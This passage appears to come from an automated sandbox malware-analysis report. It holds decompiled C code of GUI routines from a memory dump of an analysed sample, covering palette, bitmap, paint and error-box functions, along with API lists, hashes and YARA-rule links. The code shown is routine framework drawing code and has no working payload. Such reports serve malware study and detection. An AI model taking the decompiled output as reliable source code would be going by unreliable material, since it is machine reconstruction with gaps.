					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L5:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L5;
					}
				}
				if(_t82 == 0) {
					if(E00424924(_t165) == 0) {
						SetStretchBltMode(E00420704(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x4247d5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BA8(_t165, _t166);
				}
				_t89 = E00424868(_t165);
				_t177 =  *0x4247e4; // 0xf
				E004207D8(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424868(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E004247DC);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x42476a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420AFC(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CA0( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424868(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247af);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}

APIs

Part of subcall function 00424C08: GetDC.USER32(00000000), ref: 00424C5E
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C73
Part of subcall function 00424C08: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424C7D
Part of subcall function 00424C08: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042375F,00000000,004237EB), ref: 00424CA1
Part of subcall function 00424C08: ReleaseDC.USER32 ref: 00424CAC

SelectPalette.GDI32(?,?,000000FF), ref: 004245DA
RealizePalette.GDI32(?), ref: 004245E9
GetDeviceCaps.GDI32(?,0000000C), ref: 004245FB
GetDeviceCaps.GDI32(?,0000000E), ref: 0042460A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042463E
SetStretchBltMode.GDI32(?,00000004), ref: 0042464C
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424664
CreateCompatibleDC.GDI32(00000000), ref: 004246E1
SelectObject.GDI32(?,?), ref: 004246F6

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
String ID:
API String ID: 2358456236-0
Opcode ID: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction ID: c3d246f68cfade31653b275566af5ea7f18495ef8c9c9298942679e887091d32
Opcode Fuzzy Hash: 822d8c0c5b1fc19b466cdd28b2e5daef08d5921011be1d414dc2d49bcb9e4c9c
Instruction Fuzzy Hash: FA516BB5B00215AFCB40EFA9D985E5EBBF8EB89304F51846AB509E7281D738ED00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0043A424, Relevance: 16.6, APIs: 11, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043A424(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043907C(_t88) != 0) {
						_t38 = E00439F44(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E0043C1F4(_t88),  &_v80);
					E00436D28(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E0043A424(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43a576, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E0043C1F4(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x43a57d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

APIs

GetDC.USER32(00000000), ref: 0043A46F
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043A493
ReleaseDC.USER32 ref: 0043A49E
CreateCompatibleDC.GDI32(00000000), ref: 0043A4A5
SelectObject.GDI32(?,?), ref: 0043A4B5
BeginPaint.USER32(00000000,?,00000000,0043A576,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A4D7
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043A533
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0043A544
SelectObject.GDI32(?,?), ref: 0043A55E
DeleteDC.GDI32(?), ref: 0043A567
DeleteObject.GDI32(?), ref: 0043A570

Part of subcall function 00439F44: BeginPaint.USER32(00000000,?), ref: 00439F6A
Part of subcall function 00439F44: EndPaint.USER32(00000000,?,0043A06B), ref: 0043A05E

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction ID: 86ebff45ab5d5e5e7902dd9a049ce1f4de68836528b4e3a0ffe90387a61ef89e
Opcode Fuzzy Hash: c6ce3e876bf295ee34a86f7ca7c7dd2d1aedf9be2a822b285e77e78c75a6eae6
Instruction Fuzzy Hash: 5A414D71B00204ABDB00EBA9CC85B9EB7F8AF48704F10447AB50AEB282DA799D158B55

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0A0, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A0A0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004141BC( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EF40(0x80000010));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EF40(0x80000014));
							E00412B80( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414218(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E004141BC( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412B80( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004344B0(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00436D28(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}

APIs

RectVisible.GDI32(?,?), ref: 0043A159
SaveDC.GDI32(?), ref: 0043A16F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A192
RestoreDC.GDI32(?,?), ref: 0043A1AD
CreateSolidBrush.GDI32(00000000), ref: 0043A22E
FrameRect.USER32 ref: 0043A261
DeleteObject.GDI32(?), ref: 0043A26B
CreateSolidBrush.GDI32(00000000), ref: 0043A27B
FrameRect.USER32 ref: 0043A2AE
DeleteObject.GDI32(?), ref: 0043A2B8

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction ID: d7f80e08fa115caa7cc628a2e98c7148b3d638a8714db69d2232ae688719de5f
Opcode Fuzzy Hash: c4276c5b968bbb51ecb1191cd3375441d771cedfcd47410ac2e995f0bbf811e7
Instruction Fuzzy Hash: C55170712042409BDB18DF69C8C4B5B77E8AF48308F04449EED89CB396D739EC54CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0A4, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A0A4(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409F1C(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x491180; // 0x492048
				if( *_t12 == 0) {
					_t14 =  *0x490f5c; // 0x407578
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x492714; // 0x400000
					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x490fa8; // 0x492218
				E00402D34(_t22);
				_t26 = E00408BD4( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a154, 2,  &_v1092, 0);
			}

0x0040a0b3
0x0040a0b8
0x0040a0c0
0x0040a113
0x0040a118
0x0040a11c
0x0040a127
0x00000000
0x0040a13d
0x0040a0c2
0x0040a0c7
0x0040a0d7
0x0040a0ea
0x00000000

APIs

Part of subcall function 00409F1C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F39
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F5D
Part of subcall function 00409F1C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F78
Part of subcall function 00409F1C: LoadStringA.USER32 ref: 0040A00E

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A0E4
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A0EA
GetStdHandle.KERNEL32(000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A0FF
WriteFile.KERNEL32(00000000,000000F5,0040A154,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A105
LoadStringA.USER32 ref: 0040A127
MessageBoxA.USER32 ref: 0040A13D

Strings

H I, xrefs: 0040A0B8
xu@, xrefs: 0040A113

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
String ID: H I$xu@
API String ID: 1802973324-3923842764
Opcode ID: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction ID: 13a967ae5c580ad2ac90e8131e6b9058e14945a2df50c8333751adfe9f430824
Opcode Fuzzy Hash: 32cabdcad2e6483aa5f0624397b5106cba7b9691167058358ceafcaa585a4e96
Instruction Fuzzy Hash: 3E011EB11043007EE200E7A5CC42F9B77AC9B45718F40463BB755F71E2DA7899548B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004041CC, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004041CC(void* __ecx) {
				char _v4;
				int _t3;

				if( *0x492048 == 0) {
					if( *0x47601c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49221c == 0xd7b2 &&  *0x492224 > 0) {
						 *0x492234();
					}
					_t1 =  &_v4; // 0x475a64
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e, _t1, 0);
					_t2 =  &_v4; // 0x475a64
					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2, _t2, 0);
				}
			}

0x004041d4
0x00404234
0x00404244
0x00404244
0x0040424a
0x004041d6
0x004041df
0x004041ef
0x004041ef
0x004041f7
0x0040420b
0x00404212
0x0040422c
0x0040422c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
GetStdHandle.KERNEL32(000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404220
WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,dZG,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,dZG,00000000,?,0040429A), ref: 00404226
MessageBoxA.USER32 ref: 00404244

Strings

dZG, xrefs: 004041F7, 00404212, 004041FB, 00404216
Error, xrefs: 00404238
Runtime error at 00000000, xrefs: 004041FE, 0040423D

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000$dZG
API String ID: 1570097196-1623845894
Opcode ID: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction ID: 56a2d7f83fb72e5fdd31d13c6850d10172e2c0d40c461f73bd65f5ba21560b84
Opcode Fuzzy Hash: d2ffed7f8d98215c6a07db0e1ae2cbfceb1bae4e681e6e904f6eddb52037b241
Instruction Fuzzy Hash: 18F0BBA068038075FA20B3645E07F9A225D4791F19F6086FFB314B40E386FC44CC976E

Uniqueness

Uniqueness Score: -1.00%

Function 00436630, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00436630(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x43674b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E0041FC20( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x436752);
				return ReleaseDC(_v12, _v16);
			}

0x00436631
0x00436633
0x00436639
0x00436645
0x0043664b
0x0043665b
0x00436662
0x00436663
0x00436664
0x00436665
0x00436666
0x0043664d
0x0043664d
0x00436654
0x00436655
0x00436656
0x00436657
0x00436658
0x00436658
0x0043666c
0x0043667f
0x00436684
0x00436685
0x0043668a
0x0043668d
0x004366a2
0x004366ae
0x004366b6
0x004366c3
0x004366e5
0x00436704
0x0043671e
0x0043672b
0x00436732
0x00436735
0x00436738
0x0043674a

APIs

GetDesktopWindow.USER32 ref: 00436667
GetDCEx.USER32(?,00000000,00000402), ref: 0043667A
SelectObject.GDI32(?,00000000), ref: 0043669D
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004366C3
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004366E5
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436704
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043671E
SelectObject.GDI32(?,?), ref: 0043672B
ReleaseDC.USER32 ref: 00436745

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction ID: 36a13c0f66b3c7accd49027f9abdca4b27dd93f0e51766844771ffcb45b04fd4
Opcode Fuzzy Hash: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction Fuzzy Hash: AF313D75A00219BFDB00DEEDCC89DAFBBBCEF49704B018469B504F7241C679AD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00452234, Relevance: 12.1, APIs: 8, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00452234(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x4524c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E004343D4();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x491070; // 0x41d530
					E00406548(_t50,  &_v36);
					E0040A158(_v36, 1);
					E00403DA8();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x476b4c; // 0x0
				_v20 = _t58;
				_t59 =  *0x492c08; // 0x237094c
				_t60 =  *0x492c08; // 0x237094c
				E00414238( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x492c08; // 0x237094c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x492c08; // 0x237094c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x492c08; // 0x237094c
				E0045369C(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x492c08; // 0x237094c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044C628(0, 0x492c04, _t122, _t123);
				_push(_t125);
				_push(0x4524a4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E00452184(_v8);
				_push(_t125);
				_push(0x452403);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043C1F4(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E004553D4( *0x492c04, _t122, _t123);
					if( *((char*)( *0x492c04 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004520E4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043C1F4(_v8), 0xb001, 0, 0);
				_t88 = E0043C1F4(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x45240a);
				return E0045217C();
			}

APIs

GetCapture.USER32 ref: 004522AA
GetCapture.USER32 ref: 004522B9
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004522BF
ReleaseCapture.USER32(00000000,004524C4), ref: 004522C4
GetActiveWindow.USER32 ref: 004522D3
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00452369
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004523D0
GetActiveWindow.USER32 ref: 004523DF

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
